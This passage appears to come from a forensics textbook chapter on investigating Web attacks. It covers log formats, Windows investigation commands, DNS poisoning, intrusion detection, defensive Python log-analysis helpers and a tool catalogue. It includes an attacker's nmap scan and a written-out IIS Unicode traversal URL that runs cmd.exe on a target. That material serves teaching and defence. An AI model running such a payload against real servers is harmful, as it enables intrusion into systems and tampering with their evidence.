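    """Extract time/date, source IP, status code, and requested resource."""
    match = CLF_PATTERN.match(line)
    if match is None:
        return None  # e.g. malformed lines or requests logged as "-"
    return {
        "time": datetime.strptime(match["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "ip": match["ip"],
        "status": int(match["status"]),
        "resource": match["resource"],
    }


def status_class(code):
    """Map a status code to its class from Table 3-3, e.g. 404 -> '4XX'."""
    return f"{code // 100}XX"


record = parse_clf_line(
    '192.2.3.4 - - [01/Dec/2003:12:34:35 +0000] "GET /login.asp?username=blah HTTP/1.0" 500 1024'
)
print(record["ip"], record["status"], status_class(record["status"]), record["resource"])
```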

Investigating a Web Attack

To investigate Web attacks, an investigator should follow these steps:

1. Analyze the Web server, FTP server, and local system logs to confirm a Web attack.

2. Check log file information with respect to time stamps, IP address, HTTP status code, and requested resource.

3. Identify the nature of the attack. It is essential to understand the nature of the attack; otherwise, it would be difficult to stop it in its initial stages. If not stopped early, it can get out of hand.

4. Check if someone is trying to shut down the network or is attempting to penetrate into the system.

5. Localize the source.

6. Use the firewall and IDS logs to identify the source of attack. IDS and the firewall monitor network traffic and keep a record of each entry. These help identify whether the source of attack is a compromised host on the network or a third party.

7. Block the attack. Once it is established how the attacker has entered the system, that port or hole should be blocked to prevent further intrusion.

8. Once the compromised systems are identified, disconnect them from the network until they can be disinfected. If the attack is coming from an outside source, immediately block that IP address.

9. Initiate an investigation from the IP address.
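Localizing the source (steps 5 and 6) often starts with a per-address summary of error responses. The Python sketch below assumes log entries have already been parsed into dictionaries with ip and status keys, and the threshold of three errors is arbitrary. A high error count only identifies an address worth examining. As step 6 notes, the firewall and IDS logs are still needed to tell whether it is a compromised host on the network or a third party.

```python
from collections import Counter


def summarize_sources(records, min_errors=3):
    """Return {ip: (error_count, total_count)} for IPs with many 4XX/5XX replies."""
    totals, errors = Counter(), Counter()
    for record in records:
        totals[record["ip"]] += 1
        if record["status"] >= 400:  # client error and server error classes
            errors[record["ip"]] += 1
    return {ip: (errors[ip], totals[ip]) for ip in totals if errors[ip] >= min_errors}


# Hypothetical parsed entries.
records = [{"ip": "192.2.3.4", "status": 500}] * 3 + [
    {"ip": "10.0.0.7", "status": 200},
    {"ip": "10.0.0.7", "status": 404},
]
print(summarize_sources(records))
```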

Example of FTP Compromise

Before making an attempt to compromise FTP, an intruder performs port scanning. This involves connecting to TCP and UDP ports on the target system to determine the services running or in a listening state. The listening state gives an idea of the operating system and the application in use. Sometimes, active services that are listening allow unauthorized access to systems that are misconfigured or systems that run software with vulnerabilities.

The attacker may scan ports using the Nmap tool. The following shows an Nmap command and its output:

nmap -O 23.3.4.5 -p 21
Starting nmap
Interesting ports
Port      State   Service
21/tcp    open    ftp
80/tcp    open    www
Remote OS is Windows 2000

After doing port scanning, the attacker connects to FTP using the following command:

ftp 23.3.4.5

Investigating FTP Logs

IIS keeps track of hosts that access the FTP site. In Windows, the rule is to ensure continuity in the logs. IIS does not register a log entry if the server does not get any hits in a 24-hour period. This makes the presence of an empty log file inconclusive, because there is no way of telling whether the server received no hits, was offline, or had its log file deleted. The simplest workaround is to use the Task Scheduler to schedule hits.

Scheduled requests indicate whether the logging mechanism is functioning properly. If they are in place and a log file is missing, it has most likely been deleted intentionally.
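With scheduled hits in place, every day should produce a log file, so a gap in the sequence is worth investigating. The Python sketch below assumes IIS daily W3C logs named exYYMMDD.log and dates from 2000 onward; both are assumptions to adjust for the server being examined. It lists the days between the first and last log that have no file.

```python
import re
from datetime import date, timedelta

# Assumed naming convention for IIS daily W3C logs: exYYMMDD.log
LOG_NAME = re.compile(r"ex(\d{2})(\d{2})(\d{2})\.log$", re.IGNORECASE)


def missing_log_days(filenames):
    """List the days between the first and last log that have no log file."""
    days = set()
    for name in filenames:
        match = LOG_NAME.search(name)
        if match:
            yy, mm, dd = (int(part) for part in match.groups())
            days.add(date(2000 + yy, mm, dd))  # assumes logs from 2000 onward
    if not days:
        return []
    missing, day, last = [], min(days), max(days)
    while day <= last:
        if day not in days:
            missing.append(day)
        day += timedelta(days=1)
    return missing


print(missing_log_days(["ex031201.log", "ex031202.log", "ex031204.log", "notes.txt"]))
```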

Another rule is to ensure that logs are not modified in any way after they have been originally recorded. One way to achieve this is to move the IIS logs off the Web server.



Investigating FTP Servers

FTP servers are potential security problems because they are exposed to outside interfaces, inviting anyone to access them. Most FTP servers are open to the Internet and support anonymous access to public resources.

Incorrect file system settings in a server hosting an FTP server can allow unrestricted access to all resources stored on that server, and could lead to a system breach. FTP servers exposed to the Internet are best operated in the DMZ rather than in the internal network. They should be constantly updated with all of the OS and NOS fixes available, and all services other than FTP that could lead to a breach of the system should be disabled or removed. Contact from the internal network to the FTP server through the firewall should be restricted and controlled through ACL entries, to prevent possible traffic through the FTP server from returning to the internal network.

FTP servers providing service to an internal network are not immune to attack; therefore, administrators should consider establishing access controls including usernames, passwords, and SSL for authentication.

Some defensive measures that should be performed on FTP servers include the following:

• Protection of the server file system

• Isolation of the FTP directories

• Creation of authorization and access control rules

• Regular review of logs

• Regular review of directory content to detect unauthorized files and usage

Investigating IIS Logs

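IIS logs all visits in log files, located by default in %systemroot%\system32\LogFiles. If the client does not connect through a proxy, its real IP address is logged. For example, an attacker exploiting the IIS Unicode directory traversal vulnerability (%c0%af is an overlong UTF-8 encoding of /) could list the log files with the following URL:

http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1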
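An investigator reviewing IIS logs can screen request URLs for this kind of traversal. The Python sketch below is a heuristic, not a complete detector: it decodes percent escapes once, then flags any ../ or ..\ sequence and any 0xC0 or 0xC1 byte, since those bytes can only begin an overlong UTF-8 encoding such as %c0%af. Double-encoded variants (for example %255c) would need an additional decoding pass, which this sketch does not attempt.

```python
from urllib.parse import unquote_to_bytes

def looks_like_traversal(url: str) -> bool:
    """Heuristically flag a request URL that tries to climb out of the Web root."""
    raw = unquote_to_bytes(url)  # decode %XX escapes once, keeping raw bytes
    if b"../" in raw or b"..\\" in raw:
        return True
    # 0xC0 and 0xC1 never occur in valid UTF-8; they can only start an
    # overlong encoding such as %c0%af (an overlong "/").
    return any(byte in (0xC0, 0xC1) for byte in raw)
```

Running each requested URL from the log through this check gives a short list of suspicious requests to examine by hand, together with the client IP addresses that sent them.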

Investigating Apache Logs

An Apache server has two logs: the error log and the access log.

The Apache server saves diagnostic information and error messages that it encounters while processing requests in the error logs, saved as error_log in UNIX and error.log in Windows. The default path of this file in UNIX is /usr/local/apache/logs/error_log.

The format of the error log is descriptive. It is an important piece of evidence from an investigator’s point of view. Consider the following error log entry:

[Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header

The first element of the error log entry is the day, date, time, and year of the message. The second element of the entry shows the severity of the error. The third element shows the IP address of the client that generated the error, and the last element is the message itself. In this example, the message shows that the client had sent a malformed Host header. The error log is also useful in troubleshooting faulty CGI programs.
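The four elements can be separated with a regular expression, so that, for example, all errors generated by one client address can be collected. This Python sketch assumes the classic layout shown in the example; newer Apache releases add fields such as the module name and process ID, which this pattern does not separate out.

```python
import re

# [timestamp] [severity] [client address] message; the client part is optional
# because some entries (such as server start-up notices) have no client.
ERROR_LINE = re.compile(
    r"^\[(?P<time>[^\]]+)\]\s+"
    r"\[(?P<level>[^\]]+)\]\s+"
    r"(?:\[client (?P<client>[^\]]+)\]\s+)?"
    r"(?P<message>.*)$"
)

def parse_error_line(line: str):
    """Split one error log line into its elements, or return None if it does not match."""
    match = ERROR_LINE.match(line.strip())
    return match.groupdict() if match else None
```

Applied to the entry above, parse_error_line returns the timestamp Sat Dec 11 7:12:36 2004, the severity error, the client 202.116.1.3, and the message Client sent malformed Host header.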

Requests processed by the Apache server are recorded in the access log. By default, access logs are stored in the Common Log Format (CLF). The default path of this file in UNIX is /usr/local/apache/logs/access_log. Consider the following example entry:

127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326

The first element of the log file entry is the IP address of the client. The second element is the identity information returned by ident on the client machine; here, the hyphen indicates that this information was not available. The third element is the user ID of the user, as determined by HTTP authentication. The fourth element is the date and time of the request. The fifth element is the actual request line, given in double quotes. The sixth element is the status code that the server sends to the client, and the seventh element is the size of the object sent to the client, in bytes.
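The seven elements map directly onto a regular expression. The following Python sketch parses one Common Log Format line; it is an illustrative parser, not part of Apache, and it assumes the plain CLF layout shown above. Lines in the combined format carry two extra quoted fields (referrer and user agent), so the pattern would need extending for them.

```python
import re

# Common Log Format: host ident user [time] "request" status size
CLF_LINE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

def parse_clf(line: str):
    """Return the seven CLF elements as a dict, or None if the line does not match."""
    match = CLF_LINE.match(line.strip())
    if not match:
        return None
    entry = match.groupdict()
    entry["status"] = int(entry["status"])
    # A "-" size means no body was returned; record it as 0 bytes.
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry
```

Parsing the example entry yields host 127.0.0.1, user frank, request GET /apache_pb.gif HTTP/1.0, status 200, and size 2326. Once lines are parsed, filtering by host or by status code (for example, bursts of 404 or 500 responses) becomes a one-line comprehension.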

Investigating Web Attacks in Windows-Based Servers

When investigating Web attacks in Windows-based servers, an investigator should follow these steps:

1. Run Event Viewer by issuing the following command:

eventvwr.msc

2. Check if the following suspicious events have occurred:

• Event log service stops

• Windows File Protection is not active on the system

• The MS Telnet Service started successfully

3. Look for a large number of failed logon attempts or locked-out accounts.

4. Look at file shares by issuing the following command:

net view 127.0.0.1

5. Look at which users have open sessions by issuing the following command:

net session

6. Look at which sessions the machine has opened with other systems by issuing the following command:

net use

7. Look at NetBIOS over TCP/IP activity by issuing the following command:

nbtstat -S

8. Look for unusual listening TCP and UDP ports by issuing the following command:

netstat -na

9. Look for unusual scheduled tasks on the local host by issuing the following command (on later versions of Windows, where at is deprecated, use schtasks instead):

at

10. Look for new accounts in the administrator group by issuing the following command:

lusrmgr.msc

11. Look for unexpected processes by running the Task Manager.

12. Look for unusual network services by issuing the following command:

net start

13. Check file space usage to look for a sudden decrease in free space.
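Step 8 is easier to repeat consistently when the saved output of netstat -na is compared against a list of ports the server is expected to expose. The Python sketch below assumes the Windows netstat layout (Proto, Local Address, Foreign Address, State); the allow list passed to unexpected_ports is hypothetical and must come from the server's own documented configuration.

```python
def listening_ports(netstat_output: str):
    """Collect (protocol, local address, port) for listening sockets in `netstat -na` text.

    TCP rows count only in the LISTENING state. UDP rows have no state
    column, so every UDP row is treated as a bound (listening) port.
    """
    found = set()
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # skip headers, blank lines, and anything else
        proto, local = fields[0], fields[1]
        if proto == "TCP" and (len(fields) < 4 or fields[3] != "LISTENING"):
            continue
        address, _, port = local.rpartition(":")  # also works for "[::]:445"
        found.add((proto, address, int(port)))
    return found

def unexpected_ports(found, allowed):
    """Return listening entries whose (protocol, port) pair is not on the allow list."""
    return sorted(entry for entry in found if (entry[0], entry[2]) not in allowed)
```

For a Web server expected to listen only on TCP port 80, a TCP listener on port 23 would stand out, which ties back to the MS Telnet Service event checked in step 2.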

Web Page Defacement



Web page defacement is the unauthorized modification of a Web page, such as the defacement shown in Figure 3-4.

Defacement can be performed in many ways, including the following:

• Convincing the legitimate user to perform an action, such as giving away credentials, often through bribery

• Luring the legitimate user and gaining credentials

• Exploiting implementation and design errors

Web defacement requires write access to the Web server’s root directory. Having that level of access usually means the Web server has been compromised, and the compromise could come from any security vulnerability.

Common causes of Web page defacement include the following:

• Weak administrator password

• Application misconfiguration

• Server misconfiguration

• Accidental permission assignment

Figure 3-4 An unsecure Web page can be defaced by hackers.

Defacement Using DNS Compromise

An attacker who compromises the authoritative domain name server for a Web site can redirect DNS requests for the site to the attacker’s defaced Web site. This defaces the Web site indirectly, without any change to the Web server itself. For example, say the Web server’s DNS entry is the following:

www.xsecurity.com 192.2.3.4

Also, suppose that the compromised DNS entry from the attacker is the following:

www.xsecurity.com 10.0.0.3

Now all requests for www.xsecurity.com will be redirected to 10.0.0.3.

Investigating DNS Poisoning

If DNS cache poisoning is suspected, an investigator should dump the contents of the DNS server’s cache to look for inappropriate entries. On a BIND server, DNS logging can be enabled in named.conf, but it will slow the performance of the DNS server.

If an organization has configured a standard DNS server IP address but network traffic shows requests being sent to a DNS server on the Internet to resolve domain names, an investigator can extract the IP address of that DNS server and start investigating from there. For example, if a computer is configured to use the DNS server 10.0.0.2 but constantly sends its DNS requests to 128.xxx.23.xxx, it may be a case of DNS poisoning.



To investigate DNS poisoning, an investigator should follow these steps:

1. Start a packet sniffer, such as Wireshark.

2. Capture DNS packets.

3. Identify the IP being used to resolve the domain name.

4. If the IP in step 3 is a non-company-configured IP, then the victim is using a nonstandard DNS server to resolve domain names.

5. Start investigating the IP. Try to determine who owns it and where it is located.







6. Do a WHOIS lookup of the IP.
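Steps 2 through 4 amount to grouping captured DNS queries by destination and comparing each destination with the configured server. The Python sketch below assumes the capture has already been exported to (source IP, destination IP, destination port) records, for example from Wireshark; the export step and the record layout are assumptions, and 203.0.113.5 in the usage test is a hypothetical documentation address. The function counts queries sent to port 53 on any server outside the approved set.

```python
from collections import Counter

def unapproved_resolvers(flows, approved):
    """Count DNS queries per (client, server) pair for servers not in `approved`.

    `flows` holds (source IP, destination IP, destination port) records;
    destination port 53 is treated as DNS.
    """
    counts = Counter()
    for src, dst, dport in flows:
        if dport == 53 and dst not in approved:
            counts[(src, dst)] += 1
    return counts
```

With the configured server 10.0.0.2 as the only approved address, repeated queries from a workstation to an outside address show up as a nonzero count, and that outside address becomes the starting point for steps 5 and 6.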



Intrusion Detection

Intrusion detection is a technique that detects inappropriate, incorrect, or anomalous activity in a system or network. An IDS (intrusion detection system) works as an alarm, sending alerts when attacks occur on the network. It can also place restrictions on what data can be exchanged over the network.



There are two types of intrusion detection: host-based ID and network-based ID.

In host-based intrusion detection systems (HIDS), the IDS analyzes each system’s behavior. A HIDS can be installed on any system ranging from a desktop PC to a server, and is considered more versatile than a NIDS.

An example of a host-based system could be a program operating on a system that receives application or operating system audit logs. HIDS are more focused on local systems and are more common on Windows, but there are HIDS for UNIX platforms as well.

Figure 3-5 is a diagram showing how HIDS work.



A network-based intrusion detection system (NIDS) checks every packet entering the network for the presence of anomalies and incorrect data. Unlike firewalls, which only filter out data packets with obvious malicious content, a NIDS checks every packet thoroughly. Depending on the content, a NIDS raises alerts at either the IP level or the application level.

Figure 3-6 shows how a NIDS operates.

An intrusion prevention system (IPS) is considered to be the next step up from an IDS. This system monitors attacks occurring in the network or the host and actively prevents those attacks.

Security Strategies for Web Applications

The following are a few strategies to keep in mind when detecting Web application vulnerabilities:

• Respond quickly to vulnerabilities. Patches should be applied as soon as they become available.

• Fix vulnerabilities that were detected earlier.

• Pen-test the applications. This test will help an administrator understand and analyze flaws before an attack.

• Check for flaws in security through IDS and IPS tools.

• Improve security awareness.

Figure 3-5 HIDS analyze individual systems’ behavior.

Figure 3-6 A NIDS thoroughly analyzes all network traffic.









Investigating Static and Dynamic IP Addresses

IP addresses can be either static or allocated dynamically using a DHCP server. ISPs that provide Internet access to a large pool of clients usually allocate the clients’ IP addresses dynamically. The DHCP log file stores information regarding the IP address allocated to a particular host at a particular time.
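Because a dynamic address may belong to different hosts at different times, the lookup has to match both the address and the time of the incident. This Python sketch assumes the DHCP log has already been reduced to lease records of (IP address, MAC address, lease start, lease end); real DHCP logs record leases in server-specific formats, so that extraction step is not shown. All timestamps must use the same time zone as the Web server log being investigated.

```python
from datetime import datetime
from typing import Iterable, Optional, Tuple

# (IP address, MAC address, lease start, lease end): an assumed record layout.
Lease = Tuple[str, str, datetime, datetime]

def host_for_ip(leases: Iterable[Lease], ip: str, when: datetime) -> Optional[str]:
    """Return the MAC address that held `ip` at time `when`, or None if no lease covers it."""
    for lease_ip, mac, start, end in leases:
        # A lease covers the half-open interval [start, end).
        if lease_ip == ip and start <= when < end:
            return mac
    return None
```

The MAC address returned can then be tied to a specific machine or subscriber through the network’s or ISP’s own records.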









The static IP address of a particular host can be found with the help of tools such as Nslookup, WHOIS, Traceroute, ARIN, and NeoTrace.

• Nslookup is a built-in program that is frequently used to query Internet domain name servers. The information provided by Nslookup can be used to identify the DNS infrastructure.

• Traceroute details the path that IP packets travel between two systems. Because the names of the routers along that path often indicate their locations, this information can help determine the geographical location of a system.

• NeoTrace displays Traceroute information over a world map. It traces the path of the network from the host system to a target system across the Internet.

• The WHOIS database can be used to identify the owner of a Web site. The format for conducting a query from the command line is as follows: whois -h <host name> <identifier>
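The WHOIS protocol itself is simple (RFC 3912): the client opens a TCP connection to port 43 on the WHOIS server, sends the query followed by a carriage return and line feed, and reads the reply until the server closes the connection. The following Python sketch implements only that exchange; it does not follow referrals from one registry to another, which command-line whois clients often do.

```python
import socket

def query_socket(sock: socket.socket, query: str) -> str:
    """Send one WHOIS query over an open connection and return the full reply."""
    # RFC 3912: the request is the query text terminated by CRLF.
    sock.sendall(query.encode("utf-8") + b"\r\n")
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:  # the server closes the connection when the reply is complete
            break
        chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")

def whois(query: str, server: str, port: int = 43, timeout: float = 10.0) -> str:
    """Connect to a WHOIS server on TCP port 43 and return its reply to `query`."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        return query_socket(sock, query)
```

For example, whois("example.com", "whois.iana.org") asks IANA’s server, whose reply typically names the registry to query next; IP addresses in ARIN’s region can be queried at whois.arin.net.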

Checklist for Web Security

To increase Web security, an investigator or administrator should make sure the following checklist is completed:

• Make sure user accounts do not have weak or missing passwords.

• Block unused open ports.

• Check for various Web attacks.

• Check whether IDS or IPS is deployed.

• Use a vulnerability scanner to look for possible intrusion areas.

• Test the Web site to check whether it can handle large loads and SSL (if it is an e-commerce Web site).

• Document the list of techniques, devices, policies, and necessary steps for security.





Statistics



Figures 3-7 through 3-9 show the number of reported instances of various types of Web attacks, as reported by zone-h.org.

Tools for Web Attack Investigations

Analog



Analog analyzes log files from Web servers. Shown in Figure 3-10, Analog has the following features:

• Displays information such as how often specific pages are visited, the countries of the visitors, and more

• Creates HTML, text, or e-mail reports of the server’s Web site traffic

• Generates reports in 32 languages

• Fast, scalable, and highly configurable

• Works on any operating system

• Free

Figure 3-7 This table shows the reported instances of various types of Web attacks.

Figure 3-8 This table shows the number of reported defacements of several types of Web servers.

Figure 3-9 This table shows the total number of Web site defacements every year on both Linux and Windows.

Source: http://www.analog.cx/how-to/index.html. Accessed 2/2007.

Figure 3-10 Analog analyzes log files.



Deep Log Analyzer

Deep Log Analyzer analyzes the logs for small and medium Web sites. It is shown in Figure 3-11 and has the following features:

• Determines where visitors originated and the last page they visited before leaving

• Analyzes Web site visitors’ behavior

• Gives complete Web site usage statistics

• Allows creation of custom reports

• Presents advanced Web site statistics and Web analytics reports with interactive navigation and a hierarchical view

• Analyzes log files from all popular Web servers

• Downloads log files via FTP

• Processes archived logs without extracting them

Source: http://www.deep-software.com/. Accessed 2/2007.

Figure 3-11 Deep Log Analyzer is designed specifically for small and medium-sized sites.

• Displays aggregated reports from a selected date range

• Compares reports for different intervals

• Automates common tasks via scripts that can be scheduled for periodic execution

• Uses the Access MDB database format for storing information extracted from log files, so users can write their own queries if needed

• Can process updated log files and generate reports in HTML format automatically by schedule



AWStats

AWStats, short for Advanced Web Statistics, is a log analyzer that creates advanced Web, FTP, mail, and streaming server statistics reports, presented in HTML format as shown in Figure 3-12. Use of AWStats requires access to the server logs as well as the ability to run Perl scripts. AWStats has the following features:

• Can be run through a Web browser CGI (Common Gateway Interface) or directly from the operating system command line

• Able to quickly process large log files

• Support for both standard and custom log format definitions, including log files from Apache (NCSA combined/XLF/ELF or common/CLF log format), Microsoft’s IIS (W3C log format), WebStar, and most Web, proxy, WAP, and streaming media servers, as well as FTP and mail server logs

• Shows information such as number of visits, number of unique visitors, duration of visits, and Web compression statistics

• Displays domains, countries, regions, cities, and ISPs of visitors’ hosts

• Displays hosts list, latest visits, and unresolved IP addresses list

• Displays most viewed, entry, and exit pages

• Displays search engines, keywords, and phrases used to find the site

• Unlimited log file size

Source: http://awstats.sourceforge.net/docs/awstats_contrib.html#DOC. Accessed 2/2007.

Figure 3-12 AWStats creates reports in HTML format.

Server Log Analysis

Server Log Analysis analyzes server logs by changing IP addresses into domain names with the help of httpd-analyse.c.

In host files, every line that does not start with # is in the following format:

ipaddress status count name

ipaddress is the standard, dot-separated decimal IP address. status is zero if the name is good, and the h_errno value if it is not. count is the number of times the host has been accessed (if -ho is used), and name is the DNS name of the host.
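A host file in this format can be loaded for cross-referencing with the access log. The following Python sketch is an illustration, not code from httpd-analyse.c; it treats a line with no name field as an unresolved host, which is an assumption because the format description does not say how failed lookups are written. Hosts with a nonzero status are candidates for a follow-up WHOIS lookup.

```python
def parse_host_file(lines):
    """Map each IP address to (status, count, name) from host-file lines."""
    hosts = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):  # skip blank and comment lines
            continue
        fields = line.split(maxsplit=3)
        ip, status, count = fields[0], int(fields[1]), int(fields[2])
        # Assumption: a missing name field means the lookup failed.
        name = fields[3] if len(fields) > 3 else None
        hosts[ip] = (status, count, name)
    return hosts

def unresolved(hosts):
    """List addresses whose status (an h_errno value) is nonzero, i.e. failed lookups."""
    return sorted(ip for ip, (status, _count, _name) in hosts.items() if status != 0)
```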

Server Log Analysis outputs a version of the log file with the document name simplified (if necessary), and IP addresses are turned into DNS names.



WebLog Expert

WebLog Expert gives information about a site’s visitors, including activity statistics, accessed files, paths through the site, referring pages, search engines, browsers, operating systems, and more. The program produces HTML reports that include both tables and charts.

It can analyze logs of Apache and IIS Web servers and even read compressed logs directly without unpacking them. Its interface also includes built-in wizards to help a user quickly and easily create and analyze a site profile.

WebLog Expert reports the following:

• General statistics

• Activity statistics by days, hours, days of the week, and months

• Access statistics for pages, files, images, directories, queries, entry pages, exit pages, paths through the site, file types, and virtual domains

• Information about visitors’ hosts, top-level domains, countries, states, cities, organizations, and authenticated users

Source: http://www.weblogexpert.com/index.htm. Accessed 2/2007.

Figure 3-13 WebLog Expert also generates HTML reports.

• Referring sites, URLs, and search engines, including information about search phrases and keywords

• Browsers, operating systems, and spiders statistics

• Information about error types with detailed 404 error information

• Tracked files statistics (activity and referrers)

WebLog Expert has hit filters for host, requested file, query, referrer, status code, method, OS, browser, spider, user agent, day of the week, hour of the day, country, state, city, organization, authenticated user, and virtual domain. It also has visitor filters for visitors who accessed a specific file, visitors with a specified entry page, visitors with a specified exit page, visitors who came from a specific referring URL, and visitors who came from a specific search engine phrase.

WebLog Expert is shown in Figure 3-13 and also has the following features:

• Works under Windows

• Supports Apache and IIS logs

• Automatically detects the log format

• Can download logs via FTP and HTTP

• Has a log cache for downloaded log files

• Can create HTML, PDF, and CSV reports

• Reports in multiple languages

• Supports page title retrieval

• Can upload reports via FTP and send via e-mail (SMTP or MAPI)

• Has a built-in scheduler

• Has an IP-to-country mapping database

• Has additional city, state, and organization databases

• Supports date macros

• Supports multithreaded DNS lookup

• Supports command-line mode

Source: http://www.alterwind.com/loganalyzer/. Accessed 2/2007.

Figure 3-14 AlterWind Log Analyzer comes in three different versions.



AlterWind Log Analyzer

AlterWind Log Analyzer comes in three versions: Professional, Standard, and Lite.

AlterWind Log Analyzer Professional generates reports for Web site search engine optimization, Web site promotion, and pay-per-click programs. It is specifically designed to make Web site promotion more effective.

The Web stats generated by AlterWind Log Analyzer Standard help a user determine the interests of visitors and clients, analyze the results of advertisement campaigns, learn from where the visitors come to the Web site, make the Web site more appealing and easy to use for the clients, and more.

AlterWind Log Analyzer Lite is a free Web analyzer tool. This version shows just the basic characteristics of hits on a Web site.

AlterWind Log Analyzer is shown in Figure 3-14 and has the following features:

• Automatic detection of standard log file formats

• Automatic adding of log files to a log list

• Ability to change the design of reports

• Unique reports for Web site promotion

• Supports command-line mode

• Ability to customize the volume of data entered in a report

• Simultaneous analysis of a large number of log files



Webalizer

Webalizer, shown in Figure 3-15, is a fast, free, and portable Web server log file analysis program. It accepts standard common log file format (CLF) server logs and produces highly detailed, easily configurable usage statistics in HTML format. Generated reports can be configured from the command line or by the use of one or more configuration files.

Source: http://www.webalizer.org. Accessed 2/2007.

Figure 3-15 Webalizer is a fast and free Web log analyzer.



eWebLog Analyzer

eWebLog Analyzer is another Web server log analyzer that can read log files of popular Web servers, including Microsoft IIS, Apache, and NCSA, as well as any other Web server that can be configured to produce log files in Common or Combined standard format, or W3C Extended format. It supports compressed logs and can also download log files directly from FTP or HTTP servers.

eWebLog is shown in Figure 3-16 and has the following features:

• Generates a wide range of reports and statistics from log files, with 2-D and 3-D graphs

• Contains filters that allow a user to separate, isolate, and exclude different sets of data

• Automatically detects the log format

• Works under Windows

• Provides a log cache for downloaded log files





N-Stealth

N-Stealth is a vulnerability-assessment product that scans Web servers to identify security problems and weaknesses. Its database covers more than 25,000 vulnerabilities and exploits.

N-Stealth’s standard scan will scan the Web server using a set of well-known directories, including script and source directories. N-Stealth will not try to identify remote directories on the target Web server. The standard scan will always generate a static rules baseline. It is recommended for standard deployed Web servers and for faster security checks.

A complete scan will identify remote directories, and it will use this information to generate a custom rules baseline. By combining different signatures with an unpredictable set of discovered directories, this method may produce a small number of security checks (fewer than the standard method) or a large number (more than 300,000 for customized Web servers). It is recommended for nonstandard Web servers.

N-Stealth is pictured in Figure 3-17.

Source: http://www.esoftys.com/index.html. Accessed 2/2007.

Figure 3-16 eWebLog Analyzer reads many common Web log file formats.

Source: http://www.nstalker.com. Accessed 2/2007.

Figure 3-17 N-Stealth scans Web servers for known vulnerabilities.





Acunetix Web Vulnerability Scanner

Acunetix Web Vulnerability Scanner determines a Web site’s vulnerability to SQL injection, XSS, Google hacking, and more. It is pictured in Figure 3-18 and contains the following features:

• Verifies the robustness of the passwords on authentication pages

• Reviews dynamic content of Web applications such as forms

• Tests the password strength of login pages by launching a dictionary attack

• Creates custom Web attacks and checks or modifies existing ones

Figure 3-18 Acunetix Web Vulnerability Scanner determines if a site is vulnerable to several types of attacks.

• Supports all major Web technologies, including ASP, ASP.NET, PHP, and CGI

• Uses different scanning profiles to scan Web sites with different identity and scan options

• Compares scans and finds differences from previous scans to discover new vulnerabilities

• Reaudits Web site changes easily

• Crawls and interprets Flash files

• Uses automatic custom error page detection

• Discovers directories with weak permissions

• Determines if dangerous HTTP methods are enabled on the Web server (e.g., PUT, TRACE, and DELETE) and inspects the HTTP version banners for vulnerable products

dotDefender

dotDefender is a Web application firewall that blocks HTTP requests that match an attack pattern. It offers protection to the Web environment at both the application level and the user level, and also offers session attack protection by blocking attacks at the session level. dotDefender’s functionality is shown in Figure 3-19, and it blocks the following:

• SQL injection

• Proxy takeover

• Cross-site scripting

• Header tampering

• Path traversal

• Probes

• Other known attacks

Source: http://www.applicure.com. Accessed 2/2007.

Figure 3-19 dotDefender is a Web application firewall.



AppScan

AppScan runs security tests on Web applications. It offers various types of security testing such as outsourced, desktop-user, and enterprise-wide analysis, and it is suitable for all types of users, including application developers, quality assurance teams, security auditors, and senior management. AppScan is shown in Figure 3-20 and simulates a large number of automated attacks in the various phases of the software development life cycle. Its features include the following:

• Scan Expert, State Inducer, and Microsoft Word-based template reporting simplify the complex tasks of scan configuration and report creation.

• AppScan eXtension Framework and Pyscan let the community of AppScan users collaborate on open-source add-ons that extend AppScan functionality.

• Supports advanced Web 2.0 technologies by scanning and reporting on vulnerabilities found in Web services and Ajax-based applications.

• Shows a comprehensive task list necessary to fix issues uncovered during the scan.

• More than 40 out-of-the-box compliance reports, including PCI Data Security Standard, Payment Application Best Practices (PABP), ISO 17799, ISO 27001, and Basel II.

• Integrated Web-based training provides recorded security advisories to educate on application security fundamentals and best practices.

AccessDiver

AccessDiver contains multiple tools to detect security failures on Web pages. It is shown in Figure 3-21, and its features include the following:

• Performs fast security analysis using up to 100 bots

• Detects directory failures by comparing hundreds of known problems to the site

• Fully proxy compliant and has a proxy analyzer and a proxy hunter built in

• Built-in word leecher helps increase the size of dictionaries to expand and reinforce analysis

• Task automizer manages jobs transparently

• On-the-fly word manipulator

• Ping tester to determine the efficiency of the site and the efficiency of contacting another Internet address

• DNS resolver to look up the host name of an IP address or vice versa

• HTTP debugger helps a user understand how HTTP works

• WHOIS gadget to retrieve owner information of a domain name

• Update notifier

Source: http://www.ibm.com. Accessed 2/2007.

Figure 3-20 AppScan simulates many different attacks.

Source: http://www.accessdiver.com/. Accessed 2/2007.

Figure 3-21 AccessDiver has multiple tools to detect security flaws.



Falcove Web Vulnerability Scanner

Falcove audits Web sites to determine if they are vulnerable to attack, and implements corrective actions if any are found. The SQL server penetration module makes Falcove different from other Web vulnerability scanners, because it allows the user to penetrate the system using these vulnerabilities, just like an external attacker would.

It also generates penetration reports to detail vulnerabilities. Falcove is shown in Figure 3-22.



Emsa Web Monitor

Emsa Web Monitor is a small Web monitoring program that monitors the uptime status of several Web sites. It works by periodically pinging the remote sites, and showing the ping response time as well as a small graph that allows the user to quickly view the results. It runs in the system tray and is shown in Figure 3-23.

Source: http://www.programurl.com/falcove-web-vulnerability-scanner.htm. Accessed 2/2007.

Figure 3-22 Falcove lets users perform SQL server penetration on their own servers.

Source: http://emsa-web-monitor.emsa-systems.qarchive.org/. Accessed 2/2007.

Figure 3-23 Emsa Web Monitor monitors the uptime of Web sites.



Source: http://www.exclamationsoft.com/webwatchbot/default.asp. Accessed 2/2007.

